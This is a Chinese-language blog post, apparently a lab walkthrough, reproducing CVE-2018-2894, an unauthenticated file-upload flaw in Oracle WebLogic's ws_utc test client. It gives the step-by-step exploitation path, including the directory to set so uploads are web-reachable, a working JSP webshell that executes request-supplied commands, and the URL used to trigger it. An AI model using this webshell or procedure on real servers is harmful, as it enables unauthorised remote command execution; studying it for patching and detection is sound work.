Weblogic-CVE-2018-2894

漏洞背景

  该漏洞存在于 WebLogic 自带的 ws_utc 模块(Web Services Test Client)。该模块原用于测试 Web Service 接口,但其中的文件上传接口对上传内容与访问权限未做严格限制,导致攻击者可在无需认证的情况下上传 JSP 木马,并通过公开路径直接访问执行,从而远程控制服务器。

影响版本:Oracle WebLogic Server 10.3.6.0、12.1.3.0

利用条件

  • ws_utc 模块处于部署状态

  • WebLogic 控制台存在文件上传入口

  • 控制台访问路径未做身份限制(或者可绕过认证)

漏洞复现

通过虚拟机搭建靶场,访问后网页如下:

image

 漏洞点存在的路径是: /ws_utc/config.do ,这个路径还是未授权访问路径。访问页面如下:

image

然后我们把上图“Work Home Dir:  当前的工作目录”功能点的路径切换成: /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css ,点击提交(将目录设置为ws_utc应用的静态文件css目录,目的是后续无需权限即可访问上传的Webshell)。然后点击左侧“安全”功能点,进入页面后,点击“添加”,在文件上传的功能点上传jsp木马文件。如下图:

image

 上传的jsp文件内容是:

 1 <%
 2     if ("zyon".equals(request.getParameter("pass"))) {
 3         String cmd = request.getParameter("cmd");
 4         Process p = Runtime.getRuntime().exec(cmd);
 5         java.io.InputStream is = p.getInputStream();
 6         java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
 7         String output = s.hasNext() ? s.next() : "";
 8         out.println("<pre>" + output + "</pre>");
 9     }
10 %>

返回包会返回一个时间戳和上传的文件名,如下图:

image

 上传完之后“安全”功能点的的页面如下图:

image

 然后访问路径如下

http://192.168.49.151:7001/ws_utc/css/config/keystore/时间戳_上传文件名

然后拼接上命令执行“id”,成功回显,如下图:

image

总结:CVE-2018-2894 是 WebLogic 中 ws_utc 模块任意文件上传漏洞,因上传目录可被 Web 访问,攻击者可利用它上传 JSP 木马并远程命令执行,是一个典型的“未授权 + 任意上传 + RCE”组合型高危漏洞

 

posted @ 2025-08-03 18:08  ZyonSec  阅读(66)  评论(0)    收藏  举报